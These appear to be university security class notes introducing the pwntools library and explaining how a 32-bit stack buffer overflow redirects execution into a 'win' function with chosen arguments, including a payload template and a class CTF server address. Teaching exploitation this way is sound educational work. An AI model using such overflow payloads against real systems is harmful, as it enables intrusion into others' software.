Class Notes CPEG 476/676 Spring 2024

pwntools

pwntools is a python library that acts as a swiss army knife for pwning.

If you can run the line from pwn import * in a python session you're good to go.

If not then follow the instructions at: https://github.com/Gallopsled/pwntools

Also our pwndocker instructions has pwntools working already.

Here is a random pwntools script from a live CTF problem:

Here is a more useful collection of utilities I find myself using often when hacking:

OK we get the basic idea of what we need to do right?

In these problems the coder lets us write more than we should into a fixed amount of space.

It looks something like this:

This is the second problem in the zero-to-hero sequence.

Let's solve it together (video will walk through more), I took the time to host it at: nc 207.154.239.148 11986

TLDR: payload=b"A"*offset + p32(win_ADDR) + p32(mysteryhere) + p32(argument1) + p32(argument2)

Here's the normal calling convention for 32-bit:

Now suppose you are going to buffer overflow:

When you JUMP into a win function there is no pushing of the return address...

BUT the win function still acts like there should be a return address on the stack...

SO all of your arguments are shifted by one address when hacking in this way.

As pseudo-instructions:

payload="a"*offset + p32(win) + p32(x) + p32(y) + p32(z)
AKA You hack the stack and overwrite the return address to jump into some function .win
After the jump your stack looks like: p32(x) + p32(y) + p32(z)
FIRST .win saves your old (trashed) base pointer (push rbp)
Now stack looks like: "aaaa"+p32(x)+p32(y)+p32(z)
.win sets the rbp to rsp so the world doesn't burn
.win looks at rbp + two addresses for the args
Thus arg1 is p32(y) and arg2 is p32(z)
If we get to the end of .win what happens at the ret?
the LEAVE command will pop the "aaaa" off the stack
So the stack looks like: p32(x) + p32(y) + p32(z) when we ret at the end of .win
Which means p32(x) is the address of the NEXT target AFTER .win